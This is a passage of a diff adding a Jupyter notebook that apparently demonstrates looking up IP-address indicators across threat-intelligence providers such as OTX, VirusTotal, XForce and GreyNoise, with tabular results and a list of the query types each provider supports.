'Regional...</td>\n      <td>https://api.xforce.ibmcloud.com/ipr/52.183.120.194</td>\n      <td>0</td>\n    </tr>\n    <tr>\n      <th>AzSTI</th>\n      <td>52.183.120.194</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>AzSTI</td>\n      <td>False</td>\n      <td>information</td>\n      <td>Not found.</td>\n      <td>None</td>\n      <td>None</td>\n      <td>0</td>\n    </tr>\n  </tbody>\n</table>\n</div>",
+      "text/plain": "                   Ioc IocType QuerySubtype Provider Result     Severity  \\\nXForce  52.183.120.194    ipv4         None   XForce   True      warning   \nAzSTI   52.183.120.194    ipv4         None    AzSTI  False  information   \n\n                                                                                                    Details  \\\nXForce  {'score': 1, 'cats': {}, 'categoryDescriptions': {}, 'reason': 'Regional Internet Registry', 're...   \nAzSTI                                                                                            Not found.   \n\n                                                                                                  RawResult  \\\nXForce  {'ip': '52.183.120.194', 'history': [{'created': '2012-03-22T07:26:00.000Z', 'reason': 'Regional...   \nAzSTI                                                                                                  None   \n\n                                                 Reference Status  \nXForce  https://api.xforce.ibmcloud.com/ipr/52.183.120.194      0  \nAzSTI                                                 None      0  "
+     },
+     "execution_count": 7,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "result = ti_lookup.lookup_ioc(observable=\"52.183.120.194\", providers=[\"AzSTI\", \"XForce\"])\n",
+    "ti_lookup.result_to_df(result)"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 8,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2019-09-25T04:58:00.314867Z",
+     "start_time": "2019-09-25T04:58:00.000046Z"
+    }
+   },
+   "outputs": [
+    {
+     "data": {
+      "text/html": "<div>\n<style scoped>\n    .dataframe tbody tr th:only-of-type {\n        vertical-align: middle;\n    }\n\n    .dataframe tbody tr th {\n        vertical-align: top;\n    }\n\n    .dataframe thead th {\n        text-align: right;\n    }\n</style>\n<table border=\"1\" class=\"dataframe\">\n  <thead>\n    <tr style=\"text-align: right;\">\n      <th></th>\n      <th>OTX</th>\n      <th>VirusTotal</th>\n      <th>XForce</th>\n      <th>GreyNoise</th>\n      <th>AzSTI</th>\n    </tr>\n  </thead>\n  <tbody>\n    <tr>\n      <th>Ioc</th>\n      <td>52.183.120.194</td>\n      <td>52.183.120.194</td>\n      <td>52.183.120.194</td>\n      <td>52.183.120.194</td>\n      <td>52.183.120.194</td>\n    </tr>\n    <tr>\n      <th>IocType</th>\n      <td>ipv4</td>\n      <td>ipv4</td>\n      <td>ipv4</td>\n      <td>ipv4</td>\n      <td>ipv4</td>\n    </tr>\n    <tr>\n      <th>QuerySubtype</th>\n      <td>None</td>\n      <td>None</td>\n      <td>None</td>\n      <td>None</td>\n      <td>None</td>\n    </tr>\n    <tr>\n      <th>Provider</th>\n      <td>OTX</td>\n      <td>VirusTotal</td>\n      <td>XForce</td>\n      <td>GreyNoise</td>\n      <td>AzSTI</td>\n    </tr>\n    <tr>\n      <th>Result</th>\n      <td>True</td>\n      <td>True</td>\n      <td>True</td>\n      <td>False</td>\n      <td>False</td>\n    </tr>\n    <tr>\n      <th>Severity</th>\n      <td>information</td>\n      <td>information</td>\n      <td>warning</td>\n      <td>information</td>\n      <td>information</td>\n    </tr>\n    <tr>\n      <th>Details</th>\n      <td>{'pulse_count': 0, 'sections_available': ['general', 'geo', 'reputation', 'url_list', 'passive_d...</td>\n      <td>{'verbose_msg': 'IP address in dataset', 'response_code': 1, 'detected_urls': [], 'positives': 0...</td>\n      <td>{'score': 1, 'cats': {}, 'categoryDescriptions': {}, 'reason': 'Regional Internet Registry', 're...</td>\n      <td>Not found.</td>\n      <td>Not found.</td>\n    </tr>\n    <tr>\n      <th>RawResult</th>\n      <td>{'whois': 'http://whois.domaintools.com/52.183.120.194', 'reputation': 0, 'indicator': '52.183.1...</td>\n      <td>{'undetected_urls': [['http://52.183.120.194/', 'a81857a8287017ddadd3cf776a1538e136b5bff261db758...</td>\n      <td>{'ip': '52.183.120.194', 'history': [{'created': '2012-03-22T07:26:00.000Z', 'reason': 'Regional...</td>\n      <td>&lt;Response [404]&gt;</td>\n      <td>None</td>\n    </tr>\n    <tr>\n      <th>Reference</th>\n      <td>https://otx.alienvault.com/api/v1/indicators/IPv4/52.183.120.194/general</td>\n      <td>https://www.virustotal.com/vtapi/v2/ip-address/report</td>\n      <td>https://api.xforce.ibmcloud.com/ipr/52.183.120.194</td>\n      <td>https://api.GreyNoise.io/v3/community/52.183.120.194</td>\n      <td>None</td>\n    </tr>\n    <tr>\n      <th>Status</th>\n      <td>0</td>\n      <td>0</td>\n      <td>0</td>\n      <td>404</td>\n      <td>0</td>\n    </tr>\n  </tbody>\n</table>\n</div>",
+      "text/plain": "                                                                                                              OTX  \\\nIoc                                                                                                52.183.120.194   \nIocType                                                                                                      ipv4   \nQuerySubtype                                                                                                 None   \nProvider                                                                                                      OTX   \nResult                                                                                                       True   \nSeverity                                                                                              information   \nDetails       {'pulse_count': 0, 'sections_available': ['general', 'geo', 'reputation', 'url_list', 'passive_d...   \nRawResult     {'whois': 'http://whois.domaintools.com/52.183.120.194', 'reputation': 0, 'indicator': '52.183.1...   \nReference                                https://otx.alienvault.com/api/v1/indicators/IPv4/52.183.120.194/general   \nStatus                                                                                                          0   \n\n                                                                                                       VirusTotal  \\\nIoc                                                                                                52.183.120.194   \nIocType                                                                                                      ipv4   \nQuerySubtype                                                                                                 None   \nProvider                                                                                               VirusTotal   \nResult                                                                                                       True   \nSeverity                                                                                              information   \nDetails       {'verbose_msg': 'IP address in dataset', 'response_code': 1, 'detected_urls': [], 'positives': 0...   \nRawResult     {'undetected_urls': [['http://52.183.120.194/', 'a81857a8287017ddadd3cf776a1538e136b5bff261db758...   \nReference                                                   https://www.virustotal.com/vtapi/v2/ip-address/report   \nStatus                                                                                                          0   \n\n                                                                                                           XForce  \\\nIoc                                                                                                52.183.120.194   \nIocType                                                                                                      ipv4   \nQuerySubtype                                                                                                 None   \nProvider                                                                                                   XForce   \nResult                                                                                                       True   \nSeverity                                                                                                  warning   \nDetails       {'score': 1, 'cats': {}, 'categoryDescriptions': {}, 'reason': 'Regional Internet Registry', 're...   \nRawResult     {'ip': '52.183.120.194', 'history': [{'created': '2012-03-22T07:26:00.000Z', 'reason': 'Regional...   \nReference                                                      https://api.xforce.ibmcloud.com/ipr/52.183.120.194   \nStatus                                                                                                          0   \n\n                                                         GreyNoise  \\\nIoc                                                 52.183.120.194   \nIocType                                                       ipv4   \nQuerySubtype                                                  None   \nProvider                                                 GreyNoise   \nResult                                                       False   \nSeverity                                               information   \nDetails                                                 Not found.   \nRawResult                                         <Response [404]>   \nReference     https://api.GreyNoise.io/v3/community/52.183.120.194   \nStatus                                                         404   \n\n                       AzSTI  \nIoc           52.183.120.194  \nIocType                 ipv4  \nQuerySubtype            None  \nProvider               AzSTI  \nResult                 False  \nSeverity         information  \nDetails           Not found.  \nRawResult               None  \nReference               None  \nStatus                     0  "
+     },
+     "execution_count": 8,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "result = ti_lookup.lookup_ioc(observable=\"52.183.120.194\")\n",
+    "ti_lookup.result_to_df(result).T"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 9,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2019-09-25T04:58:00.486796Z",
+     "start_time": "2019-09-25T04:58:00.315866Z"
+    },
+    "tags": []
+   },
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "OTX\n",
+      "ioc: 38.75.137.9 ( ipv4 )\n",
+      "result: True\n",
+      "{   'names': [   'Underminer.EK - Exploit Kit IOC Feed',\n",
+      "                 '<script '\n",
+      "                 'src=\"https://otx.alienvault.com/pulse/5d4d8ccdbe24622d01f9ce9f.js\"></script>',\n",
+      "                 'Underminer.EK - Exploit Kit IOC Feed',\n",
+      "                 'Underminer EK'],\n",
+      "    'pulse_count': 4,\n",
+      "    'references': [   [],\n",
+      "                      [],\n",
+      "                      [],\n",
+      "                      [   'https://blog.malwarebytes.com/threat-analysis/2019/07/exploit-kits-summer-2019-review/']],\n",
+      "    'tags': [['Underminer.EK'], ['Underminer.EK'], ['Underminer.EK'], []]}\n",
+      "reference:  https://otx.alienvault.com/api/v1/indicators/IPv4/38.75.137.9/general\n"
+     ]
+    }
+   ],
+   "source": [
+    "import pprint\n",
+    "pp = pprint.PrettyPrinter(indent=2)\n",
+    "\n",
+    "result, details = ti_lookup.lookup_ioc(observable=\"38.75.137.9\", providers=[\"OTX\"])\n",
+    "\n",
+    "# the details is a list (since there could be multiple responses for an IoC)\n",
+    "for provider, detail in details:\n",
+    "    print(provider)\n",
+    "    detail.summary\n",
+    "# Un-comment to view raw response\n",
+    "#     print(\"\\nRaw Results\")\n",
+    "#     pp.pprint(detail.raw_result)\n"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "#### Or convert result to a DataFrame and let pandas do the display work..."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 10,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2019-09-25T04:58:00.498762Z",
+     "start_time": "2019-09-25T04:58:00.487768Z"
+    }
+   },
+   "outputs": [
+    {
+     "data": {
+      "text/html": "<div>\n<style scoped>\n    .dataframe tbody tr th:only-of-type {\n        vertical-align: middle;\n    }\n\n    .dataframe tbody tr th {\n        vertical-align: top;\n    }\n\n    .dataframe thead th {\n        text-align: right;\n    }\n</style>\n<table border=\"1\" class=\"dataframe\">\n  <thead>\n    <tr style=\"text-align: right;\">\n      <th></th>\n      <th>OTX</th>\n    </tr>\n  </thead>\n  <tbody>\n    <tr>\n      <th>Ioc</th>\n      <td>38.75.137.9</td>\n    </tr>\n    <tr>\n      <th>IocType</th>\n      <td>ipv4</td>\n    </tr>\n    <tr>\n      <th>QuerySubtype</th>\n      <td>None</td>\n    </tr>\n    <tr>\n      <th>Provider</th>\n      <td>OTX</td>\n    </tr>\n    <tr>\n      <th>Result</th>\n      <td>True</td>\n    </tr>\n    <tr>\n      <th>Severity</th>\n      <td>high</td>\n    </tr>\n    <tr>\n      <th>Details</th>\n      <td>{'pulse_count': 4, 'names': ['Underminer.EK - Exploit Kit IOC Feed', '&lt;script src=\"https://otx.a...</td>\n    </tr>\n    <tr>\n      <th>RawResult</th>\n      <td>{'whois': 'http://whois.domaintools.com/38.75.137.9', 'reputation': 0, 'indicator': '38.75.137.9...</td>\n    </tr>\n    <tr>\n      <th>Reference</th>\n      <td>https://otx.alienvault.com/api/v1/indicators/IPv4/38.75.137.9/general</td>\n    </tr>\n    <tr>\n      <th>Status</th>\n      <td>0</td>\n    </tr>\n  </tbody>\n</table>\n</div>",
+      "text/plain": "                                                                                                              OTX\nIoc                                                                                                   38.75.137.9\nIocType                                                                                                      ipv4\nQuerySubtype                                                                                                 None\nProvider                                                                                                      OTX\nResult                                                                                                       True\nSeverity                                                                                                     high\nDetails       {'pulse_count': 4, 'names': ['Underminer.EK - Exploit Kit IOC Feed', '<script src=\"https://otx.a...\nRawResult     {'whois': 'http://whois.domaintools.com/38.75.137.9', 'reputation': 0, 'indicator': '38.75.137.9...\nReference                                   https://otx.alienvault.com/api/v1/indicators/IPv4/38.75.137.9/general\nStatus                                                                                                          0"
+     },
+     "execution_count": 10,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "result = ti_lookup.lookup_ioc(observable=\"38.75.137.9\", providers=[\"OTX\"])\n",
+    "ti_lookup.result_to_df(result).T"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 11,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2019-09-25T04:58:00.519751Z",
+     "start_time": "2019-09-25T04:58:00.499762Z"
+    },
+    "scrolled": true
+   },
+   "outputs": [
+    {
+     "data": {
+      "text/plain": "{'whois': 'http://whois.domaintools.com/38.75.137.9',\n 'reputation': 0,\n 'indicator': '38.75.137.9',\n 'type': 'IPv4',\n 'type_title': 'IPv4',\n 'base_indicator': {'id': 2127020821,\n  'indicator': '38.75.137.9',\n  'type': 'IPv4',\n  'title': '',\n  'description': '',\n  'content': '',\n  'access_type': 'public',\n  'access_reason': ''},\n 'pulse_info': {'count': 4,\n  'pulses': [{'id': '5d4d8ccdbe24622d01f9ce9f',\n    'name': 'Underminer.EK - Exploit Kit IOC Feed',\n    'description': 'IPs and hostnames for the Exploit Kit known as Underminer.EK.',\n    'modified': '2021-04-14T19:27:12.332000',\n    'created': '2019-08-09T15:10:05.503000',\n    'tags': ['Underminer.EK'],\n    'references': [],\n    'public': 1,\n    'adversary': '',\n    'targeted_countries': [],\n    'malware_families': [],\n    'attack_ids': [],\n    'industries': [],\n    'TLP': 'white',\n    'cloned_from': None,\n    'export_count': 770,\n    'upvotes_count': 0,\n    'downvotes_count': 0,\n    'votes_count': 0,\n    'locked': False,\n    'pulse_source': 'api',\n    'validator_count': 0,\n    'comment_count': 0,\n    'follower_count': 0,\n    'vote': 0,\n    'author': {'username': 'otxrobottwo_testing',\n     'id': '83138',\n     'avatar_url': 'https://otx.alienvault.com/assets/images/default-avatar.png',\n     'is_subscribed': False,\n     'is_following': False},\n    'indicator_type_counts': {},\n    'indicator_count': 0,\n    'is_author': False,\n    'is_subscribing': None,\n    'subscriber_count': 445,\n    'modified_text': '6 days ago ',\n    'is_modified': True,\n    'groups': [],\n    'in_group': False,\n    'threat_hunter_scannable': False,\n    'threat_hunter_has_agents': 1,\n    'related_indicator_type': 'IPv4',\n    'related_indicator_is_active': 0},\n   {'id': '5f78ad73cb75802b9c81068f',\n    'name': '<script src=\"https://otx.alienvault.com/pulse/5d4d8ccdbe24622d01f9ce9f.js\"></script>',\n    'description': '',\n    'modified': '2020-10-03T16:57:55.377000',\n    'created': '2020-10-03T16:57:23.187000',\n    'tags': ['Underminer.EK'],\n    'references': [],\n    'public': 1,\n    'adversary': '',\n    'targeted_countries': [],\n    'malware_families': [],\n    'attack_ids': [],\n    'industries': [],\n    'TLP': 'white',\n    'cloned_from': '5d4d8ccdbe24622d01f9ce9f',\n    'export_count': 3,\n    'upvotes_count': 0,\n    'downvotes_count': 0,\n    'votes_count': 0,\n    'locked': False,\n    'pulse_source': 'web',\n    'validator_count': 0,\n    'comment_count': 0,\n    'follower_count': 0,\n    'vote': 0,\n    'author': {'username': 'fisher7801',\n     'id': '125860',\n     'avatar_url': 'https://otx.alienvault.com/assets/images/default-avatar.png',\n     'is_subscribed': False,\n     'is_following': False},\n    'indicator_type_counts': {},\n    'indicator_count': 0,\n    'is_author': False,\n    'is_subscribing': None,\n    'subscriber_count': 8,\n    'modified_text': '200 days ago ',\n    'is_modified': False,\n    'groups': [],\n    'in_group': False,\n    'threat_hunter_scannable': False,\n    'threat_hunter_has_agents': 1,\n    'related_indicator_type': 'IPv4',\n    'related_indicator_is_active': 0},\n   {'id': '5db816cba3e59aeced1fad16',\n    'name': 'Underminer.EK - Exploit Kit IOC Feed',\n    'description': 'IPs and hostnames for the Exploit Kit known as Underminer.EK.',\n    'modified': '2019-11-04T13:21:54.514000',\n    'created': '2019-10-29T10:39:07.558000',\n    'tags': ['Underminer.EK'],\n    'references': [],\n    'public': 1,\n    'adversary': '',\n    'targeted_countries': [],\n    'malware_families': [],\n    'attack_ids': [],\n    'industries': [],\n    'TLP': 'white',\n    'cloned_from': None,\n    'export_count': 2,\n    'upvotes_count': 0,\n    'downvotes_count': 0,\n    'votes_count': 0,\n    'locked': False,\n    'pulse_source': 'api',\n    'validator_count': 0,\n    'comment_count': 0,\n    'follower_count': 0,\n    'vote': 0,\n    'author': {'username': 'otxrobottwo',\n     'id': '78495',\n     'avatar_url': 'https://otx20-web-media.s3.amazonaws.com/media/avatars/user_78495/resized/80/avatar_ba5a8acdbd.png',\n     'is_subscribed': False,\n     'is_following': False},\n    'indicator_type_counts': {'hostname': 1, 'domain': 1, 'IPv4': 7},\n    'indicator_count': 9,\n    'is_author': False,\n    'is_subscribing': None,\n    'subscriber_count': 397,\n    'modified_text': '534 days ago ',\n    'is_modified': True,\n    'groups': [],\n    'in_group': False,\n    'threat_hunter_scannable': True,\n    'threat_hunter_has_agents': 1,\n    'related_indicator_type': 'IPv4',\n    'related_indicator_is_active': 1},\n   {'id': '5d41d77901a2f8c6e9b650e9',\n    'name': 'Underminer EK',\n    'description': '',\n    'modified': '2019-07-31T18:01:29.744000',\n    'created': '2019-07-31T18:01:29.744000',\n    'tags': [],\n    'references': ['https://blog.malwarebytes.com/threat-analysis/2019/07/exploit-kits-summer-2019-review/'],\n    'public': 1,\n    'adversary': '',\n    'targeted_countries': [],\n    'malware_families': [],\n    'attack_ids': [],\n    'industries': [],\n    'TLP': 'white',\n    'cloned_from': None,\n    'export_count': 1,\n    'upvotes_count': 0,\n    'downvotes_count': 0,\n    'votes_count': 0,\n    'locked': False,\n    'pulse_source': 'web',\n    'validator_count': 0,\n    'comment_count': 0,\n    'follower_count': 0,\n    'vote': 0,\n    'author': {'username': 'mattvittitoe',\n     'id': '79520',\n     'avatar_url': 'https://otx.alienvault.com/assets/images/default-avatar.png',\n     'is_subscribed': False,\n     'is_following': False},\n    'indicator_type_counts': {'URL': 16, 'FileHash-MD5': 5, 'IPv4': 3},\n    'indicator_count': 24,\n    'is_author': False,\n    'is_subscribing': None,\n    'subscriber_count': 33,\n    'modified_text': '630 days ago ',\n    'is_modified': False,\n    'groups': [],\n    'in_group': False,\n    'threat_hunter_scannable': True,\n    'threat_hunter_has_agents': 1,\n    'related_indicator_type': 'IPv4',\n    'related_indicator_is_active': 1}],\n  'references': ['https://blog.malwarebytes.com/threat-analysis/2019/07/exploit-kits-summer-2019-review/'],\n  'related': {'alienvault': {'adversary': [],\n    'malware_families': [],\n    'industries': []},\n   'other': {'adversary': [], 'malware_families': [], 'industries': []}}},\n 'false_positive': [],\n 'validation': [],\n 'asn': 'AS63023 AS-GLOBALTELEHOST',\n 'city_data': True,\n 'city': 'Los Angeles',\n 'region': 'CA',\n 'continent_code': 'NA',\n 'country_code3': 'USA',\n 'country_code2': 'US',\n 'subdivision': 'CA',\n 'latitude': 34.0544,\n 'postal_code': '90009',\n 'longitude': -118.244,\n 'accuracy_radius': 1000,\n 'country_code': 'US',\n 'country_name': 'United States of America',\n 'dma_code': 803,\n 'charset': 0,\n 'area_code': 0,\n 'flag_url': '/assets/images/flags/us.png',\n 'flag_title': 'United States of America',\n 'sections': ['general',\n  'geo',\n  'reputation',\n  'url_list',\n  'passive_dns',\n  'malware',\n  'nids_list',\n  'http_scans']}"
+     },
+     "execution_count": 11,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "# Extract a single field (RawResult) from the dataframe (.iloc[0] is to select the row)\n",
+    "ti_lookup.result_to_df(result)[\"RawResult\"].iloc[0]"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "## Lookup using all primary providers"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 12,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2019-09-25T04:58:03.536452Z",
+     "start_time": "2019-09-25T04:58:00.520750Z"
+    },
+    "scrolled": true
+   },
+   "outputs": [
+    {
+     "data": {
+      "text/html": "<div>\n<style scoped>\n    .dataframe tbody tr th:only-of-type {\n        vertical-align: middle;\n    }\n\n    .dataframe tbody tr th {\n        vertical-align: top;\n    }\n\n    .dataframe thead th {\n        text-align: right;\n    }\n</style>\n<table border=\"1\" class=\"dataframe\">\n  <thead>\n    <tr style=\"text-align: right;\">\n      <th></th>\n      <th>Ioc</th>\n      <th>IocType</th>\n      <th>QuerySubtype</th>\n      <th>Provider</th>\n      <th>Result</th>\n      <th>Severity</th>\n      <th>Details</th>\n      <th>RawResult</th>\n      <th>Reference</th>\n      <th>Status</th>\n    </tr>\n  </thead>\n  <tbody>\n    <tr>\n      <th>OTX</th>\n      <td>188.127.231.124</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>OTX</td>\n      <td>True</td>\n      <td>high</td>\n      <td>{'pulse_count': 7, 'names': ['IOC 06/12/2019', '27/11/2019 IOCs', 'Ransomware IP Blocklist', 'Lo...</td>\n      <td>{'whois': 'http://whois.domaintools.com/188.127.231.124', 'reputation': 0, 'indicator': '188.127...</td>\n      <td>https://otx.alienvault.com/api/v1/indicators/IPv4/188.127.231.124/general</td>\n      <td>0</td>\n    </tr>\n    <tr>\n      <th>VirusTotal</th>\n      <td>188.127.231.124</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>VirusTotal</td>\n      <td>True</td>\n      <td>information</td>\n      <td>{'verbose_msg': 'IP address in dataset', 'response_code': 1, 'detected_urls': ['http://188.127.2...</td>\n      <td>{'asn': 56694, 'undetected_urls': [['https://radiosfera.net/subject/5391/mikroshema-la4280', '90...</td>\n      <td>https://www.virustotal.com/vtapi/v2/ip-address/report</td>\n      <td>0</td>\n    </tr>\n    <tr>\n      <th>XForce</th>\n      <td>188.127.231.124</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>XForce</td>\n      <td>True</td>\n      <td>warning</td>\n      <td>{'score': 1, 'cats': {}, 'categoryDescriptions': {}, 'reason': 'Regional Internet Registry', 're...</td>\n      <td>{'ip': '188.127.231.124', 'history': [{'created': '2012-03-22T07:26:00.000Z', 'reason': 'Regiona...</td>\n      <td>https://api.xforce.ibmcloud.com/ipr/188.127.231.124</td>\n      <td>0</td>\n    </tr>\n    <tr>\n      <th>GreyNoise</th>\n      <td>188.127.231.124</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>GreyNoise</td>\n      <td>False</td>\n      <td>information</td>\n      <td>Not found.</td>\n      <td>&lt;Response [404]&gt;</td>\n      <td>https://api.GreyNoise.io/v3/community/188.127.231.124</td>\n      <td>404</td>\n    </tr>\n    <tr>\n      <th>AzSTI</th>\n      <td>188.127.231.124</td>\n      <td>ipv4</td>\n      <td>None</td>\n      <td>AzSTI</td>\n      <td>False</td>\n      <td>information</td>\n      <td>Not found.</td>\n      <td>None</td>\n      <td>None</td>\n      <td>0</td>\n    </tr>\n  </tbody>\n</table>\n</div>",
+      "text/plain": "                        Ioc IocType QuerySubtype    Provider Result  \\\nOTX         188.127.231.124    ipv4         None         OTX   True   \nVirusTotal  188.127.231.124    ipv4         None  VirusTotal   True   \nXForce      188.127.231.124    ipv4         None      XForce   True   \nGreyNoise   188.127.231.124    ipv4         None   GreyNoise  False   \nAzSTI       188.127.231.124    ipv4         None       AzSTI  False   \n\n               Severity  \\\nOTX                high   \nVirusTotal  information   \nXForce          warning   \nGreyNoise   information   \nAzSTI       information   \n\n                                                                                                        Details  \\\nOTX         {'pulse_count': 7, 'names': ['IOC 06/12/2019', '27/11/2019 IOCs', 'Ransomware IP Blocklist', 'Lo...   \nVirusTotal  {'verbose_msg': 'IP address in dataset', 'response_code': 1, 'detected_urls': ['http://188.127.2...   \nXForce      {'score': 1, 'cats': {}, 'categoryDescriptions': {}, 'reason': 'Regional Internet Registry', 're...   \nGreyNoise                                                                                            Not found.   \nAzSTI                                                                                                Not found.   \n\n                                                                                                      RawResult  \\\nOTX         {'whois': 'http://whois.domaintools.com/188.127.231.124', 'reputation': 0, 'indicator': '188.127...   \nVirusTotal  {'asn': 56694, 'undetected_urls': [['https://radiosfera.net/subject/5391/mikroshema-la4280', '90...   \nXForce      {'ip': '188.127.231.124', 'history': [{'created': '2012-03-22T07:26:00.000Z', 'reason': 'Regiona...   \nGreyNoise                                                                                      <Response [404]>   \nAzSTI                                                                                                      None   \n\n                                                                            Reference  \\\nOTX         https://otx.alienvault.com/api/v1/indicators/IPv4/188.127.231.124/general   \nVirusTotal                      https://www.virustotal.com/vtapi/v2/ip-address/report   \nXForce                            https://api.xforce.ibmcloud.com/ipr/188.127.231.124   \nGreyNoise                       https://api.GreyNoise.io/v3/community/188.127.231.124   \nAzSTI                                                                            None   \n\n           Status  \nOTX             0  \nVirusTotal      0  \nXForce          0  \nGreyNoise     404  \nAzSTI           0  "
+     },
+     "execution_count": 12,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "result = ti_lookup.lookup_ioc(observable=\"188.127.231.124\")\n",
+    "ti_lookup.result_to_df(result)"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "## Provider Usage\n",
+    "This shows the supported IoC Types.\n",
+    "\n",
+    "In some cases an IoC type will also support special types of sub-query such as geo-ip and passive-dns"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 13,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2019-09-25T04:58:03.543449Z",
+     "start_time": "2019-09-25T04:58:03.537451Z"
+    },
+    "tags": []
+   },
+   "outputs": [
+    {
+     "data": {
+      "text/plain": "['OTX - AlientVault OTX Lookup. (primary)',\n 'VirusTotal - VirusTotal Lookup. (primary)',\n 'XForce - IBM XForce Lookup. (primary)',\n 'GreyNoise - GreyNoise Lookup. (primary)',\n 'AzSTI - Azure Sentinel TI provider class. (primary)',\n 'OPR - Open PageRank Lookup. (secondary)']"
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "Azure Sentinel TI provider class. Supported query types:\n",
+      "\tioc_type=dns\n",
+      "\tioc_type=file_hash\n",
+      "\tioc_type=hostname\n",
+      "\tioc_type=ipv4\n",
+      "\tioc_type=ipv6\n",
+      "\tioc_type=linux_path\n",
+      "\tioc_type=md5_hash\n",
+      "\tioc_type=sha1_hash\n",
+      "\tioc_type=sha256_hash\n",
+      "\tioc_type=url\n",
+      "\tioc_type=windows_path\n"
+     ]
+    }
+   ],
+   "source": [
+    "display(ti_lookup.provider_status)\n",
+    "ti_lookup.loaded_providers[\"AzSTI\"].usage()"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 14,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2019-09-25T04:58:03.566435Z",
+     "start_time": "2019-09-25T04:58:03.544447Z"
+    },
+    "tags": []
+   },
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "Primary providers\n",
+      "-----------------\n",
+      "\n",
+      "Provider class: OTX\n",
+      "AlientVault OTX Lookup. Supported query types:\n",
+      "\tioc_type=dns\n",
+      "\tioc_type=dns, ioc_query_type=geo\n",
+      "\tioc_type=dns, ioc_query_type=passivedns\n",
+      "\tioc_type=file_hash\n",
+      "\tioc_type=hostname\n",
+      "\tioc_type=ipv4\n",
+      "\tioc_type=ipv4, ioc_query_type=geo\n",
+      "\tioc_type=ipv4, ioc_query_type=passivedns\n",
+      "\tioc_type=ipv6\n",
+      "\tioc_type=ipv6, ioc_query_type=geo\n",
+      "\tioc_type=ipv6, ioc_query_type=passivedns\n",
+      "\tioc_type=md5_hash\n",
+      "\tioc_type=sha1_hash\n",
+      "\tioc_type=sha256_hash\n",
+      "\tioc_type=url\n",
+      "\n",
+      "Provider class: VirusTotal\n",
+      "VirusTotal Lookup. Supported query types:\n",
+      "\tioc_type=dns\n",
+      "\tioc_type=file_hash\n",
+      "\tioc_type=ipv4\n",
+      "\tioc_type=md5_hash\n",
+      "\tioc_type=sha1_hash\n",
+      "\tioc_type=sha256_hash\n",
+      "\tioc_type=url\n",
+      "\n",
+      "Provider class: XForce\n",
+      "IBM XForce Lookup. Supported query types:\n",
+      "\tioc_type=dns\n",
+      "\tioc_type=dns, ioc_query_type=malware\n",
+      "\tioc_type=dns, ioc_query_type=passivedns\n",
+      "\tioc_type=dns, ioc_query_type=whois\n",
+      "\tioc_type=file_hash\n",
+      "\tioc_type=hostname, ioc_query_type=whois\n",
+      "\tioc_type=ipv4\n",
+      "\tioc_type=ipv4, ioc_query_type=malware\n",
+      "\tioc_type=ipv4, ioc_query_type=passivedns\n",
+      "\tioc_type=ipv4, ioc_query_type=rep\n",
+      "\tioc_type=ipv4, ioc_query_type=whois\n",
+      "\tioc_type=ipv6\n",
+      "\tioc_type=ipv6, ioc_query_type=malware\n",
+      "\tioc_type=ipv6, ioc_query_type=passivedns\n",
+      "\tioc_type=ipv6, ioc_query_type=rep\n",
+      "\tioc_type=ipv6, ioc_query_type=whois\n",
+      "\tioc_type=md5_hash\n",
+      "\tioc_type=sha1_hash\n",
+      "\tioc_type=sha256_hash\n",
+      "\tioc_type=url\n",
+      "\tioc_type=url, ioc_query_type=malware\n",
+      "\n",
+      "Provider class: GreyNoise\n",
+      "GreyNoise Lookup. Supported query types:\n",
+      "\tioc_type=ipv4\n",
+      "\tioc_type=ipv4, ioc_query_type=full\n",
+      "\tioc_type=ipv4, ioc_query_type=quick\n",
+      "\n",
+      "Provider class: AzSTI\n",
+      "Azure Sentinel TI provider class. Supported query types:\n",
+      "\tioc_type=dns\n",
+      "\tioc_type=file_hash\n",
+      "\tioc_type=hostname\n",
+      "\tioc_type=ipv4\n",
+      "\tioc_type=ipv6\n",
+      "\tioc_type=linux_path\n",
+      "\tioc_type=md5_hash\n",
+      "\tioc_type=sha1_hash\n",
+      "\tioc_type=sha256_hash\n",
+      "\tioc_type=url\n",
+      "\tioc_type=windows_path\n",
+      "\n",
+      "Secondary providers\n",
+      "-------------------\n",
+      "\n",
+      "Provider class: OPR\n",
+      "Open PageRank Lookup. Supported query types:\n",
+      "\tioc_type=dns\n"
+     ]
+    }
+   ],
+   "source": [
+    "ti_lookup.provider_usage()"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "### Use to do a passive DNS lookup"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 15,
+   "metadata": {
+    "ExecuteTime": {
